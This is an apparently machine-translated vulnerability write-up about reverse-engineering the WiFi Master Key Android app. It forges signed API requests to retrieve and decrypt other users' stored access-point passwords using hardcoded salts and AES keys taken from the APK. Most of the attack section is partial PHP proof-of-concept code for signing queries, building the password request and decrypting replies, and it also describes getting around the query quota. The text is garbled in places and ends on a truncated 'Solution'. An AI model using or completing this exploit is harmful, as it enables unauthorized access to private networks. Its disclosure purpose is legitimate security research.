WIFI universal key password query interface algorithm cracking (unlimited query of users' AP plaintext passwords)

WIFI universal key password query interface algorithm cracking (unlimited query of users' AP plaintext passwords)

All Apps involve communication interfaces. After reading the APP with the master key, the plaintext HTTP protocol is simple.

There is a killer in analyzing the Android program, that is, the new version of the program made API changes during the update iteration, but for compatibility consideration, the old version of the problematic API will not go offline and there will always be online...
 

1. Downloaded From GooglePlay. the WIFI universal key of Version X can be used. It can be analyzed through the package analysis algorithm (in plain text storage of various keys and salt, there is no confusion even if it is character concatenation ...)
 

This is the data packet used to query the password and the sign (Signature) algorithm in the parameter. In fact, the data is sorted and then calculated as md5 using salt. The new version of the master key also has a retSn, which achieves chain authentication and can also break through, but this report only says 1. API problems in Version x (1. in the x era, many details are obviously not well-considered, and only sign is used for security ).
 

Use JAVA to sign a password query request
 

To verify authenticity, I added a "1OpenWrt" to a nearby OpenWrt SSID, and calculated the signature query, bingo!
 

The first part is complete, but it seems that the returned password is a long string that does not actually disclose the user's plaintext password. But how can I connect without the plaintext client... Apk analysis shows that AES encryption is used, and key and iv are also leaked.
 

Continue using JAVA program
 

Hey hey, it turns out your password is this (same as this friend's analysis http://drops.wooyun.org/papers/4976)

In addition, a prompt is displayed during the test.
 

After analysis, it turns out that the dhid has a daily query quota and continues to analyze the dhid algorithm, which is returned by the server. The specific forgery is not mentioned. It is basically the analysis package, packaging the sign, and sending the package.

 

In this way, the SSID and BSSID are used to query the plaintext passwords of any AP. To prove the truth and avoid malicious use, I only release part of the POC code, and the vendor can understand it at a glance.

Function sign ($ array, $ do) {// signature algorithm $ request_str = ''; $ salt =''; $ sign = ''; // Arrays in the corresponding apk. sort the sort array, and test PHP to use ksort ($ array); foreach ($ array as $ key => $ value) {$ request_str. = $ value;} if ($ do = 'querypwd') {$ sign = md5 ($ request_str. SALT);} elseif ($ do = 'querydhid') {$ sign = md5 ($ request_str. SALT2);} else {NULL;} return $ sign ;}

Query Password

function get_pwd(){$ssid = addslashes( $_POST['ssid'] );$mac = addslashes( $_POST['mac'] );$data = '';$array = array("och" => "guanwang", "ii"=> "123456789012345","appid"=> "0006","pid"=> "qryapwd:commonswitch","mac"=>"xx:xx:xx:xx:xx:xx","lang"=>"cn","bssid"=>"$mac,","v"=>"58","ssid"=>"$ssid,","method"=>"getSecurityCheckSwitch","uhid"=> "a0000000000000000000000000000001","st"=> "m","chanid"=> "googleplay","dhid" => get_dhid());$sign = sign( $array , 'querypwd' );foreach ($array as $key => $value) {if ( $key == 'bssid') {$data .= "sign=" . strtoupper($sign) . "&";}$data .= "$key=" . urlencode( $value ) . "&";}

AES decrypted

Function decryptStrin ($ str, $ keys = AESKey, $ iv = AESIV, $ cipher_alg = MCRYPT_RIJNDAEL_128) {// Wi-Fi universal key password is encrypted using AES/CBC/NoPadding mode $ decrypted_string = mcrypt_decrypt ($ cipher_alg, $ keys, pack ("H *", $ str ), MCRYPT_MODE_CBC, $ iv); return $ decrypted_string ;}

I feel like I have learned a lot in the whole process...



PS: the old version is shared by default with the user WIFI, 1.0.8, remember? Is it true that the user agrees without knowing it?
 

vc2hpMS5wbmc=" src="http://www.bkjia.com/uploads/allimg/150408/0426331963-10.png" width="600" />

 

 

Solution:

Filter